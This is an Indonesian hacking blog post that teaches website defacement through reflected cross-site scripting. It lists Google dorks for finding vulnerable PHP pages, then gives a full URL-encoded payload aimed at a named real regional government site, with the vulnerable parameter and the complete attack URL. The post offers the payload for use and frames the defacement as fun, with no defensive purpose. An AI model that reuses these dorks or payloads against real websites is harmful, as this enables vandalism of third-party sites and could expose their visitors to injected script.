#Deface Metode Cross Site Scripting (XSS)
Pagi BrooO And Sistah Kali ini Saya akan Membahas Tentang Deface Metode XSS
Apa itu XSS?
---------------------------------------------------
XSS merupakan kependekan yang digunakan untuk istilah cross site scripting.
XSS merupakan salah satu jenis serangan injeksi code (code injection attack). XSS dilakukan oleh penyerang dengan cara memasukkan kode HTML atau client script code lainnya ke suatu situs. Serangan ini akan seolah-olah datang dari situs tersebut. Akibat serangan ini antara lain penyerang dapat mem-bypass keamanan di sisi klien, mendapatkan informasi sensitif, atau menyimpan aplikasi berbahaya.
XSS yang paling banyak digunakan adalah jenis GET dan POST.
Salah satu contoh yang akan dibahas adalah jenis GET.
Mengatasi XSS
---------------------------------------------------
PHP sangat handal dalam melakukan konversi string dengan cepat. Tetapi jenis apa yang akan anda lakukan jika hal diatas terjadi?
Saya melakukan survey terhadap teman-teman programmer.
Tidak sedikit yang menjawab "Pakai saja htmlentities() atau strip_tags()"
htmlentities() memang dapat melakukan konversi tag-tag HTML, tetapi bagaimana dengan Javascript?
strip_tags() memang dapat melakukan konversi tag-tag HTML dan PHP dengan NULL byte, tetapi bagaimana dengan Javascript?
Ok langsung saja Ke TKP :v
DORK :
inurl:"/showcatrows.php?CategoryID="
intext:"Website by Mile High Creative"
nurl:".php?cmd="
inurl:".php?z="
inurl:".php?q="
inurl:".php?search="
inurl:".php?query="
(Masih Banyak lagi Pakek Otak Mesum kalian) :v
Disini saya memakai Live Target Hasil Scannan Mesin Tempurku Ini Juga Kebetulan Dapat Target XSS :D
Live Target : http://www.mentawaikab.go.id/
Disini saya sudah dapat Celahnya Yaitu di Bagian /detil_isi.php?n
Tinggal masukin Script Javnya Deh :D
(TEXT KAMU)<%2Ftitle><body+bgcolor%3D"black"><center><marquee><b><font+color%3D"lime"><h1>TEXT KAMU<%2Fh1><%2Ffont><%2Fb><%2Fmarquee><br%2F><br%2F><b><font+color%3D"yellow">TEXT KAMU<%2Ffont><%2Fb><%2Fcenter><noscript><!--'))%2C%40)<marquee>K<%2Fmarquee><script>alert('TEXT KAMU')<%2Fscript>&id=6
Keterangan :
Tulisan Berwarna Biru Ganti Sesuka Hati Kalian :D
(TEXT KAMU)<%2Ftitle> : Untuk Menambahkan Text pada <Title>
<body+bgcolor%3D"black"><center><marquee><b><font+color%3D"lime"> : Untuk Menambahkan Background Color & Efek Blank
<h1>TEXT KAMU<%2Fh1><%2Ffont><%2Fb><%2Fmarquee><br%2F><br%2F> : Untuk Menambahkan Text Di bagian Headernya
<%2Fcenter><noscript><!--'))%2C%40)<marquee>K<%2Fmarquee><script>alert('TEXT KAMU')<%2Fscript>&id=6 : Untuk Menambahkan Text Di bagian Tengah Script.
EXECUTION
Ok Tinggal di Eksekusi deh :D
Contoh : www.targetmu.com/CelahXssnya>ScriptJavnya
http://www.mentawaikab.go.id//detil_isi.php?n=(TEXT KAMU)<%2Ftitle><body+bgcolor%3D"black"><center><marquee><b><font+color%3D"lime"><h1>TEXT KAMU<%2Fh1><%2Ffont><%2Fb><%2Fmarquee><br%2F><br%2F><b><font+color%3D"yellow">TEXT KAMU<%2Ffont><%2Fb><%2Fcenter><noscript><!--'))%2C%40)<marquee>K<%2Fmarquee><script>alert('TEXT KAMU')<%2Fscript>&id=6
Ok Jadi Deh :D
Metode Deface Ini Bisa di sebut juga URL Poisoning, Metode ini tidak bisa Nebas INDEX Hanya Memanipulasi Di bagian URLnya Saja ...
Dan Untuk Mengasah "OTAK BOKEPERS" kalian :D
Oke Sekian Dari Saya MRX_001
#KEEPSHAREISFUN
*bila ingin di salin mohon sertakan sumber :) terimakasih
Thanks to all member Cyrus Cyber :)
comment 6 comments:
more_vertUhh wkwk
October 9, 2016 at 8:08 PMDelete Post It Or We remove Blogger It
October 9, 2016 at 8:10 PMRipenglish gblk :v
October 11, 2016 at 8:41 PMHarusnya
Remove this post, or we are will delete this blog
:V
October 11, 2016 at 8:50 PMGBLK sangad :V
October 11, 2016 at 9:25 PM-Assyf Tamfan
Wadooh parah kelen google di bully :3
October 13, 2016 at 2:31 AM*Komentar Dengan Sopan !
*Jangan OOT ^_^
sentiment_satisfied Emoticon